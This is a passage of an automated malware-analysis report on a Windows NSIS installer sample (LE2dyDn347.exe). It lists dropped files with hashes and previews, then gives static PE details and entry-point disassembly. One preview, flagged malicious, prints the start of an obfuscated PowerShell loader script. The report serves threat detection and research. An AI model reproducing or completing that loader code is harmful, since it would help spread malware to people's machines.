                                                                                    Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3083), with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):53839
                                                                                    Entropy (8bit):5.3356476519761245
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:VnMQRpbsoBglh9oQ5s5rQDEN2xpBZ0ujrIWnWbQgthw:eQnsoiyQUQDFfNjLWbQYK
                                                                                    MD5:68FE284CB05B045569C77EF1F2ED6248
                                                                                    SHA1:959AE02EAD90D99D8A151B7454B82D334A1F02FA
                                                                                    SHA-256:8D2CE84A148A632B27F9738E7ECBA2FE8B0DABE1CCBF8FCF34AE3B88FFDE6EB4
                                                                                    SHA-512:5881F4B9E1F00E241FFEAE07556F23CF5618F5DA90E442EC8F56C1018682A245C5BD0D745343B986F1E8A1CEDE1A0EE2112A762604C6789AE7CB28E15374D068
                                                                                    Malicious:true
                                                                                    Reputation:low
                                                                                    Preview:$Totalleverancer=$Cypsela;........$Xylography = @'.U ipl.flamm$Aut stAppaleKinkltZizanr Tilta divis rijot.verpyAnasplUn ubi,abalc,nchr=Olfac$PencaHDominaTse.arA kebiBfsano Brddl,nthraQuesttKac oi BrinoAntivnArt s;Lepta.Cele f edstu curanNonsacOxalet Petti Pebeo BiganUngoa ,eaprThidfroCavesnSylisgAns taUdpunn Slide BlinrEmpoweKoelrnW ntosDctva Prten( Sttt$InterM IndsiDecalnFo.faeKitinrMilieeFractrChefp,Hydr $UnmerSshetllAnkereS dbrm arrymUnnooeInco.nSuper)Const I,der{Preha. Bea,. Unet$DemokHSpitzyGondcgSpildr dseloreexesZincic B iloHeliopRimedyhalve Peri ( PlayF Ad laFu ktcParlaeHaanlt,ublisUmbri Trnin' T tarDow,leF.erttK,rfii NonirSanic$NonsuN Til,oSnorknGyros. dagiaUpligMStolp Gi.dlKSpiriaF llosNasocsBedkniPhr aPOcurraB telrIntolaSka.rsGrossnBenitLSojabianalomMil,tn UdstsOr ane StraHAfreteA.tomrTrusto umboiButterCapsi HorseLAbse ResetvDe ere St aeR,mudFBattel,onace TubuaJordvpWilmarCra b Gal iB Geni Fu re,pectaR dri Sko aF icksoBeregrIndemtA geloTasia-slagsHIntrai Res pBrighpBeef.o

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Allopathetic.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):515
                                                                                    Entropy (8bit):4.277858619921549
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:JQv8v9gHAaiwwX4ZGLhzMMxFcRvKdMEHu7:60v+HAhXJhzMfvKdMl7
                                                                                    MD5:9A0BD3A51566D0D82A3A1CA9F4987BC3
                                                                                    SHA1:B24BFF57346381E4799683C05D3466D4173C0D13
                                                                                    SHA-256:CEEB2707C882A9C9ADD1E0EF451F723A253611CC83EA10B0951EA8C9DB1A9E12
                                                                                    SHA-512:C97D2C650D8E69A143DED56EFE20F0C89D5105099CC667CD7414E09D831F2E76FDC6DA9ABF1969D38824CC6274CE4EB365EC01370203DF1C000666676A42EAE3
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:unshifty undigressiveness perspektiveres coltskin dentning gizz.Pigers cutlass centrerende signalbeskrivelsens lagerekspedienter siren..Ideologiserer gristmilling cathies landsmaal spurveungernes spolingers overwing..;platie supranaturalismen benefactrices dslet,islamistic unshabbily plying transistoriserings devitrifiable gooders..claudication acutenesses fallings perradially brutalitarian preobserved archspy.Surgery malkemaskinernes tantals gynecocracy impactionizes sportspladsens formaters billedgallerier..

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Beundringsvrdigere.str

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):3604215
                                                                                    Entropy (8bit):0.15976548173781424
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:qFxuGQ0Qi2Fcaiidr1Pveihrh3qeMy70blz3WtYowdUqg6dwhXnkTDbtNRbSUF38:qFbeMXhPr3IuaQXtY0x0
                                                                                    MD5:78AE19E1B2F81B4AB07E73195003FA78
                                                                                    SHA1:7DCBFB9019D2015E05065B15D0C574C092D4990A
                                                                                    SHA-256:81D6F0852FAF84012C68AD8CA1F6AE5EB9C5DE12AD4DDA12D0ABBCA5A519A5C4
                                                                                    SHA-512:F0718D0194BC219052911B1E8C09460D55E9BF4EF5B04B800528A8EF2468F2FCBD88552736F056DEB6C5B5159D78E93B253F48B7D1AA4408276BBFF62B96F137
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:.............+............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~..............................................................................................................................................................................................................@...........................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Klagefrists.Sub

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):314859
                                                                                    Entropy (8bit):7.735293807273354
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:4d/1ieBFrIwf02g8TC5yQW59Ron4XHYCNpjazMoBKl6jk6SbDoR3zTn2:4h1Hcwf02g8WY59Ro4XHLxaznKlh6Scq
                                                                                    MD5:98108A6D6C9942CDA8D9B90E749F4E74
                                                                                    SHA1:79DFB91D44D1AE5E46F2CB32E909399A8F475475
                                                                                    SHA-256:C5105376F37E84518C2FFA3B166D97836F3C8E0036289F4FC6C5D83F21717793
                                                                                    SHA-512:7A5AAB1C10694C6997E652A9A44D7EBA28A83B752A6AB5F257F79B7A20E12D982EC89D89991E44CD70AA76991EAD7DE238885CC9F13C378F340FBF363CFDC465
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:.............XXX.M.......S..................ii.......V.........,........w.............W.n....'._.....\\............................l..............r..N.&.c......................%..F....................xx..........:.......................................z. ...9..............R...U........Q.UU.................I.u..............G...+..........99999........aaa.................OO......****..................4..P...]..p...+......9......BB....U.ii.EE..l............~............................l.{{{{{....b..bbb.nnn.&.=..\.....W.]].....\\.............GG.................................w......FF...........uu.ii.555..////.D.....O.!..........FFF............T.d....EEE.%....o...........+++........{{{{..IIIII..B..........OO..'.......o...................&.^^^...!!!.......p.c..ii...4.QQQ........................................zzzz.......<........................P...............rr.......h.=.......NN.]............Q...........jjjjjjjjjjjj........4...d.......F............M.gg.................!.......V........

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Pejlekompassets.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):655
                                                                                    Entropy (8bit):4.371554369088806
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:TAXFhPstv50LaG6YDdLX8UkUB36IN7FM0W6MXDND89f1gpz2v:TltvGOCDd8Uke36INBMpiUpzI
                                                                                    MD5:146F4828F98632F9BC20DF5B44184B31
                                                                                    SHA1:1AC1213FFDE002901D74C5083DDC59676D48F0F3
                                                                                    SHA-256:D98DBE09DF44C620029EC4AF0D8F543BAEF1632B4698C938575995BADA6C1CBF
                                                                                    SHA-512:300DC27B6D6CC92CB9930F8591D53FCDC52C095AFFA07BBDAB4D7515925E7AD2CC0477850A8C9C9389CBE195F91101E51C212FB6CB1ADFB29C77A939C39ABF87
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:;diernss frdigkonstruerende industrien.Fljen attenuations sawer ergoterapeutskole..;revolutionsleder transformationalist paranormally proconsularly,filistrse sveskestens teis tilsmudsning socklessness vrtstypens..Hjdedrag fantomerne lookup leveringsgarantiernes flyttelig kogeplade bembex manuskriptforfatter homebuild schistous livmoderes mellemteknikernes datalreres..Oplysningspjece betties sulajmas tambour proscriptive,forcefield trdepuderne companeros saliggrelserne ours sammenfldelsen..Antherid hyperconservatism creative opkrvningsgebyrets ggemmernes..;fideist indberettes stephanian.Brndevine poblacion fyldords abreuvoir chickens vandrefugles..

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Smaagrinendes.jpg

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 710x507, components 3
                                                                                    Category:dropped
                                                                                    Size (bytes):76516
                                                                                    Entropy (8bit):7.975680918560362
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:ivQTc9h4VKLPE8qgKwQdEoNBhugBt7Silp8DLuLaBZzPhyXgz:JiLPpqgAyoL1flCDGaBZ7h
                                                                                    MD5:656697EAB78EC61202671708424C99B3
                                                                                    SHA1:D8FDE579DBB5046D9B2D17FC423070A1D2DF6D40
                                                                                    SHA-256:97F6A6D7619C1851F7D9E32097F25D2A24A8B3A6B50E4926A1A7D9D278792E98
                                                                                    SHA-512:F2F5490B9CB568EA9D58219D5FA9252E87213BF2F797E598D5AAAA8848B2F08F2C33063BBFDC8B5FA4841CE2911F98AC4879C1EF51B9F67F5FA5F5B6FE352DF1
                                                                                    Malicious:false
                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...|+.W.....<.k=cr\......u.yOC.h.&.E.vA.f.D9aZ7..cy.K..b.9F.`..\.(.8QN.9c.RI.A.0qL.......d...z..`.....do.Lb...I..)./X.|.MB..=y...D.c..W./.:f..'.......+.,..oJ.".....QVR.a...S..WwE&.0.c.E\.....>.V@v..q.Ri.y.....)j_.R...nbY.`.H..iK0....\....?.w......%.p.4In.[1..NY..!...*.*m................=+U..Fw....+,.GE.nj..!d]....J.....V[q.....=....NHVQ.T...1.y#....w...~...

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\baadmotorers.gra

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1121986
                                                                                    Entropy (8bit):0.15736345256952325
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:IOnF0q2ZYc42rO2GfJDIXQV1fldFCCV50u3qgzSMYe/0MSrpvKVFpHPvzTsb/3td:ZF2FLSrVpFCCzZky0MSr+XMb/3293d7k
                                                                                    MD5:A30BA5C80AE4D93E93F40114D85DD2EF
                                                                                    SHA1:BA67D3304DA558A67DB870692D890BB10B37FC95
                                                                                    SHA-256:B611B7C0CC4BB5D7E82AB8B7D39795354768BE0D40ACCC5DCCD3A232C62BDFA2
                                                                                    SHA-512:2D35BB63BAFEDFB994B13314ADF275D4ED9550574800AD5258EE3B2C51C2EB946F2817EF97A77724C1E0ED9EFC1F8AAD41A4B032E69E8212DE308004AA36F5CE
                                                                                    Malicious:false
                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Q................................

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\beaternes.jpg

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 465x381, components 3
                                                                                    Category:dropped
                                                                                    Size (bytes):36782
                                                                                    Entropy (8bit):7.965240879796642
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:2wfrTPF5sEmqlXrr5ZRJaclC8ErAXKPMJhJ6FNuiBR:2iIEnlbNZRJaclCWXKUJ3IBR
                                                                                    MD5:E3B39B1676F095CBC20403CB34931C81
                                                                                    SHA1:95BB9F399BE4E150E7603F4A426C98741943AE98
                                                                                    SHA-256:E52A963A182C28F1DAE261902138D823631CCEF4C36699398C55A67A910E8603
                                                                                    SHA-512:CAE4FF821E3374D4B8F3F866584114AB12EB6935F446789C3484FCA4CD8BA5E9791FBB72BA383BEC2648996A8BA7D78035D511BBE9EF33F135CCC868604D7614
                                                                                    Malicious:false
                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......}...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....~..p<Q..@.A..S....,c.n.R.N..):R(G...jA.c.h...7A.*,T..0...}(d*.H.pi....K.......iz.p..@.L.4.2jO....#9....MM.r.zjcp..%.....1.%...0"1.A...*..2..H.j.Q.....Ts@QC..t...36s.4.<......EB..9...L..BsN)........J.'.........S.v.$.GlS.(l.=.....s...@..'.G .G.........zc.iA..c.C.I.....`GZU..O^..X$+...=..D.'.H.Vl..c..*H8#=q.CE......0....KD.{".....j..\..........q..E.*..A....1.

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\forsumpningen.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):471
                                                                                    Entropy (8bit):4.408942634084189
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:u5XTgw5/tqxRkMZe8weXoso+ap1315MNTmVhpGT:Il1K5eYXosFUwT
                                                                                    MD5:81825F5A3C5889A64CC5E7386956D69D
                                                                                    SHA1:12DC29C98E718A5B8C55C43FBEA3B0C2B26F01C7
                                                                                    SHA-256:61E62F3E5F08A2322D31A77FAC73D5FAB72280680CBB2E4D9FCB6F20B85015D4
                                                                                    SHA-512:F63637ED0571A3284A02431669D8D16E132A8F1AAA3EAEE689A70303AEFFD034C37A11B01B5F2E6469B409B7D43E895E111895190F8B8CB633E5084A48CBACD4
                                                                                    Malicious:false
                                                                                    Preview:[informationsmateriale subsimilation]......efterlever overtrde reasseverate revolve,liberationist dislaurel elytrocele electrocorticogrammes..Billigbog petunia kkkenrulles attenuate sweatbox calamine foreloebige minimums simplifying albuminometry solindfald..;wellman mikkelines poppyfish unclubable tilsvrger,featherwing eftergivelsens spikily ligas phosphoritic unfinished remodulating..denseness adibasi knugendes dezincked.Uspanteca institutionalisering bombarderes..

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\macilency.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:Generic INItialization configuration [speedgun streamside]
                                                                                    Category:dropped
                                                                                    Size (bytes):507
                                                                                    Entropy (8bit):4.598205480907472
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:ZSqYSGJUjDm2NgqFYan+VbxWeFn8eKuEdt77hB3eg9EQmO:7ZGqyrMYan+3jfkJJJ9/
                                                                                    MD5:B1AF91B6787FDF01669802CAE261B2CC
                                                                                    SHA1:1E5D293E86F5F368DD82DF6EF12E50F86040EE73
                                                                                    SHA-256:522D2484824EDE653D7A473072E3D56C35496FAE219A74CA850380E6CDFD855E
                                                                                    SHA-512:524CC148E43BA14A7E0F4189979B971A6DC5E126907E9A14AE29F74C3E7C5EF7BE88306917C6A0F79666D6B508158E94F4E60DD74C01E6D42EBACE8A0E53B55F
                                                                                    Malicious:false
                                                                                    Preview:[SOLACING TOTALIZE]..[speedgun streamside]..bragede atmospheres ethnopsychology,afvrgemanvren boskiness annekssognet unsack biclavate flaxboard mindres opgangsperiodens lignous markedsfringsomkostningers stringmen..Superannuation pseudohydrophobia fdeegnes actin wagonway claspers jiggliest physeteridae goyetian anticipatingly..policeless bygbrd annika biathlon subsection whiskyer postpycnotic gymnospermous tilbagekaldte,bruskbolden nonaudibly blodserumers tilkastedes femaleness afviklings diplomati....

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\snorkenes.jpg

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 45x256, components 3
                                                                                    Category:dropped
                                                                                    Size (bytes):1143
                                                                                    Entropy (8bit):7.311849517666253
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:D9YMWe0o0XxDuLHeOWXG4OZ7DAJuLHenX3/QuHx0gg2tmS2SyN3Edxo0:D9YMluERAtxKgoS2wdxo0
                                                                                    MD5:6B0AA1CB301EB0780ABBD6341DF6C409
                                                                                    SHA1:BBAC6A8938A075ED8EF1B0FCC46B78BBE326B77D
                                                                                    SHA-256:97FE2C6E2AEAF82D743C36F4D7288C638C7FEFDFA216B809F5CA5618F8F9FF6B
                                                                                    SHA-512:2872F3598AC0D51E63F95153DADA5E298574DB18A2ABE084B920FD180C627A2C4D22591942DF476CBE48B721B38CAADFE17412DE4626AA24B218318DA6B8C344
                                                                                    Malicious:false
                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........-.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(.......J(...E.R.(....&ii..%..R....4.)..m.>.(..Hh...M.4..u.QH...\Ip.. .........U...[....qa$.PO.Q..Oq..f...S..(...2?.b.LO.)u.h...ZZJ3L...w.?....2G.y.T....Q..RP!i.A.4....ZF......\.u..%...^...Uq.a.k*....f...D.{.......[..T..y.....Pi).u#..g?........O.b`.R(.....c..d2J|...0k..A......fXi.gr..I.........sZ..0....f....f.IT!..1J)(.YC:7....6.}I?...Ag...q{.iu.).......R...PY....

                                                                                    C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\wedfee.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):82
                                                                                    Entropy (8bit):4.196887029897656
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:rnlATyz0h+XgDK4L4qBjFCWy:LaWzZQVHjTy
                                                                                    MD5:4FD57F45A05331EEE230A3C78B78B44D
                                                                                    SHA1:DD72F2993A6AE356E37DCED1B4800321B9003A46
                                                                                    SHA-256:93E231E93A74CBB2498D89E8028B9C27EC7B15B1C41E757F0B6BA09B532ADAE5
                                                                                    SHA-512:25B1D54918AD31D2C7549229C38C4EEEC408962D6B7D3C0D63B1D902B3DBDDD0E426F0FC8F53AC23E61EA1DD0216C9CE15C184E393016607D0973FC6E0BC0F25
                                                                                    Malicious:false
                                                                                    Preview:..............;markgrever tempuras robustiousness.Carbo presimian pulldrive urds..

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0h0kp22y.2du.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlwq2gjs.t15.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrf303t5.te5.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfb4d54b.zya.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.671057868070418
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:LE2dyDn347.exe
                                                                                    File size:663'005 bytes
                                                                                    MD5:b3688b35ceac51a6461e8c270b959c91
                                                                                    SHA1:dac88f1b96c5090b828dc639130fade6315306cf
                                                                                    SHA256:b7219044f45a1b030f5b784d35a92f1ee2d2343059fd7467115a5456fb2e5cba
                                                                                    SHA512:c9926429b25ac685e426db96f82ef1cb236cdf6c51095ad0d13a8fc6206adf14ca0d0822a7343782c8dd3600c83e4b0fa9e464f51bee007a7b0131bcf6d8722c
                                                                                    SSDEEP:12288:0al8Dgf1QjUQ3pHaJPQCNrLN5WHYLd6seARBHpfhENEceP0Xq+G9a7:wgtQTaVQOXLd6sL5EbeB9a7
                                                                                    TLSH:A1E422027124CE2FD9A119B00CF74C62B7993C019E15973B779EB72978FA4678B0BA52
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........r.../...............+.......Rich............PE..L....C.f.................d....9......3............@

                                                                                    File Icon

                                                                                    Icon Hash:5ba4b9130c26f7c3

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4033b5
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x660843E7 [Sat Mar 30 16:55:03 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:671f2a1f8aee14d336bab98fea93d734

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 00000224h
                                                                                    push esi
                                                                                    push edi
                                                                                    xor edi, edi
                                                                                    push 00008001h
                                                                                    mov dword ptr [ebp-14h], edi
                                                                                    mov dword ptr [ebp-0Ch], 0040A188h
                                                                                    mov dword ptr [ebp-08h], edi
                                                                                    mov byte ptr [ebp-04h], 00000020h
                                                                                    call dword ptr [0040809Ch]
                                                                                    mov esi, dword ptr [004080A0h]
                                                                                    lea eax, dword ptr [ebp-000000C4h]
                                                                                    push eax
                                                                                    mov dword ptr [ebp-000000B0h], edi
                                                                                    mov dword ptr [ebp-30h], edi
                                                                                    mov dword ptr [ebp-2Ch], edi
                                                                                    mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                                    call esi
                                                                                    test eax, eax
                                                                                    jne 00007F2694C7FD31h
                                                                                    lea eax, dword ptr [ebp-000000C4h]
                                                                                    mov dword ptr [ebp-000000C4h], 00000094h
                                                                                    push eax
                                                                                    call esi
                                                                                    cmp dword ptr [ebp-000000B4h], 02h
                                                                                    jne 00007F2694C7FD1Ch
                                                                                    movsx cx, byte ptr [ebp-000000A3h]
                                                                                    mov al, byte ptr [ebp-000000B0h]
                                                                                    sub ecx, 30h
                                                                                    sub al, 53h
                                                                                    mov byte ptr [ebp-2Ah], 00000004h
                                                                                    neg al
                                                                                    sbb eax, eax
                                                                                    not eax
                                                                                    and eax, ecx
                                                                                    mov word ptr [ebp-30h], ax
                                                                                    cmp dword ptr [ebp-000000B4h], 02h
                                                                                    jnc 00007F2694C7FD14h
                                                                                    and byte ptr [ebp-2Ah], 00000000h
                                                                                    cmp byte ptr [ebp-000000AFh], 00000041h
                                                                                    jl 00007F2694C7FD03h
                                                                                    movsx ax, byte ptr [ebp-000000AFh]
                                                                                    sub eax, 40h
                                                                                    mov word ptr [ebp-30h], ax
                                                                                    jmp 00007F2694C7FCF6h
                                                                                    mov word ptr [ebp-30h], di
                                                                                    cmp dword ptr [ebp-000000C0h], 0Ah
                                                                                    jnc 00007F2694C7FCFAh
                                                                                    and word ptr [ebp+00000000h], 0000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
